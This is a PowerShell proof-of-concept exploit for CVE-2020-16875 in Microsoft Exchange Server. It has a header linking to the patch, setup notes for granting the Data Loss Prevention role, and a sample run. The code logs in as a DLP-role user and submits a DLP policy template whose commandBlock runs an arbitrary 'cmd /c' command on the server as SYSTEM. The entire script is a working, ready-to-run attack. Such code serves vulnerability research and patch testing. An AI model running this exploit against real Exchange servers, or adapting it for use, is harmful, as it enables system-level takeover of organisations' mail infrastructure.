# Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability
# Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875
#
# Notes:
#
# Precondition: the account passed as -usr must hold the Exchange "Data Loss Prevention" management role
# (the script authenticates as that user, so this is a post-authentication bug). The role can be granted
# from the Exchange Management Shell, for example:
# [PS] C:\Windows\system32>New-RoleGroup -Name "dlp users" -Roles "Data Loss Prevention" -Members "harrym"
#
# Name AssignedRoles RoleAssignments ManagedBy
# ---- ------------- --------------- ---------
# dlp users {Data Loss Prevention} {Data Loss Prevention-dlp users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}
#
#
# [PS] C:\Windows\system32>Get-RoleGroup "dlp users" | Format-List
#
# RunspaceId : 098e1140-30e3-4144-8028-2174fdb43b85
# ManagedBy : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}
# RoleAssignments : {Data Loss Prevention-dlp users}
# Roles : {Data Loss Prevention}
# DisplayName :
# ExternalDirectoryObjectId :
# Members : {exchangedemo.com/Users/Harry Mull}
# SamAccountName : dlp users
# Description :
# RoleGroupType : Standard
# LinkedGroup :
# Capabilities : {}
# LinkedPartnerGroupId :
# LinkedPartnerOrganizationId :
# Identity : exchangedemo.com/Microsoft Exchange Security Groups/dlp users
# IsValid : True
# ExchangeVersion : 0.10 (14.0.100.0)
# Name : dlp users
# DistinguishedName : CN=dlp users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com
# Guid : fa5c8458-8255-4ffd-b128-2a66bf9dbfd6
# ObjectCategory : exchangedemo.com/Configuration/Schema/Group
# ObjectClass : {top, group}
# WhenChanged : 6/12/2020 11:29:31 PM
# WhenCreated : 6/12/2020 11:29:31 PM
# WhenChangedUTC : 6/12/2020 3:29:31 PM
# WhenCreatedUTC : 6/12/2020 3:29:31 PM
# OrganizationId :
# Id : exchangedemo.com/Microsoft Exchange Security Groups/dlp users
# OriginatingServer : DEAD01.exchangedemo.com
# ObjectState : Changed
#
# Example:
#
# PS C:\Users\researcher> .\cve-2020-16875.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr harrym@exchangedemo.com -pwd user123### -cmd mspaint
# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with harrym@exchangedemo.com:user123###
# (+) executed mspaint as SYSTEM!
# PS C:\Users\researcher>
# Script parameters. -pwd is taken as plain text on the command line, so it may be visible in
# process listings and shell history; the script offers no prompting/SecureString alternative.
param (
    # Exchange host to target, e.g. host.example.com.
    [Parameter(Mandatory)] [string] $server,
    # Account holding the "Data Loss Prevention" role, e.g. user@domain.
    [Parameter(Mandatory)] [string] $usr,
    # That account's password, in plain text.
    [Parameter(Mandatory)] [string] $pwd,
    # Command line to run on the server via "cmd /c" (defaults to mspaint).
    [string] $cmd = "mspaint"
)
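Function Get-RandomAlphanumericString {
    <#
    .SYNOPSIS
    Returns a random string of [0-9A-Za-z] characters; used as a throwaway DLP policy name.
    .PARAMETER length
    Number of characters to return (default 8). A non-positive length yields an empty string.
    .NOTES
    Characters are drawn WITH replacement, so any requested length is honoured. The previous
    implementation used "Get-Random -Count $length" over the 62-character alphabet, which samples
    without replacement and therefore silently capped the result at 62 characters (and produced
    only distinct characters). Get-Random is not a cryptographic RNG; the name only needs to be
    unlikely to collide with an existing policy name.
    #>
    [CmdletBinding()]
    Param (
        [int] $length = 8
    )
    Process {
        if ($length -le 0) {
            # 1..0 would be a descending range in PowerShell, so guard explicitly.
            return ''
        }
        # digits, upper-case, lower-case
        $alphabet = [char[]]((0x30..0x39) + (0x41..0x5A) + (0x61..0x7A))
        $chars = foreach ($i in 1..$length) {
            Get-Random -InputObject $alphabet
        }
        Write-Output (-join $chars)
    }
}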
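function Exploit-Exchange {
    <#
    .SYNOPSIS
    Opens an Exchange remote PowerShell session as the given user and creates a DLP policy whose
    template carries a <commandBlock>; Exchange evaluates that block server-side, which is the
    CVE-2020-16875 primitive. Nothing in this script verifies that the command actually ran;
    the "executed" line only means New-DlpPolicy was submitted without a terminating error.
    .PARAMETER server
    Exchange host; the session goes to http://<server>/PowerShell/ with Kerberos authentication.
    .PARAMETER usr
    Account holding the "Data Loss Prevention" role (see the header notes).
    .PARAMETER pwd
    That account's password in plain text.
    .PARAMETER cmd
    Command line handed to "cmd /c" inside the template. It is spliced into a double-quoted
    PowerShell string and a CDATA section unescaped, so a value containing a double quote,
    a dollar sign or "]]>" can break or change the generated payload.
    #>
    Param (
        [string] $server,
        [string] $usr,
        [string] $pwd,
        [string] $cmd
    )
    # Report the target without the password; this output can end up in transcripts and logs.
    "(+) targeting $server with $usr"
    $securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)
    # Build the template before any network activity. The backtick-escaped `$ keep the inner
    # script's variables out of this here-string's expansion; only $cmd is expanded locally.
    $xml = @"
<dlpPolicyTemplates>
<dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0">
<contentVersion>4</contentVersion>
<publisherName>si</publisherName>
<name>
<localizedString lang="en"></localizedString>
</name>
<description>
<localizedString lang="en"></localizedString>
</description>
<keywords></keywords>
<ruleParameters></ruleParameters>
<policyCommands>
<commandBlock>
<![CDATA[ `$i=New-object System.Diagnostics.ProcessStartInfo;`$i.UseShellExecute=`$true;`$i.FileName="cmd";`$i.Arguments="/c $cmd";`$r=New-Object System.Diagnostics.Process;`$r.StartInfo=`$i;`$r.Start() ]]>
</commandBlock>
</policyCommands>
<policyCommandsResources></policyCommandsResources>
</dlpPolicyTemplate>
</dlpPolicyTemplates>
"@
    $n = Get-RandomAlphanumericString
    [Byte[]]$d = [System.Text.Encoding]::UTF8.GetBytes($xml)
    # -ErrorAction Stop: a failed connection (bad credentials, unreachable host) must abort here.
    # Without it $s is $null, Invoke-Command only raises a non-terminating error, and the
    # success line below would still be printed.
    $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds -ErrorAction Stop
    try {
        Invoke-Command -Session $s -ScriptBlock {
            New-DlpPolicy -Name $Using:n -TemplateData $Using:d
        } | Out-Null
        "(+) executed $cmd as SYSTEM!"
    }
    finally {
        # Always release our own session rather than relying on the caller to sweep Get-PSSession.
        Remove-PSSession -Session $s
    }
}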
# Tear down every PSSession in this runspace (not only ones created by this script) so a
# session left over from an earlier run does not linger, then run the attack with the
# script parameters.
foreach ($stale in Get-PSSession) {
    Remove-PSSession -Session $stale
}
$exploitArgs = @{
    server = $server
    usr    = $usr
    pwd    = $pwd
    cmd    = $cmd
}
Exploit-Exchange @exploitArgs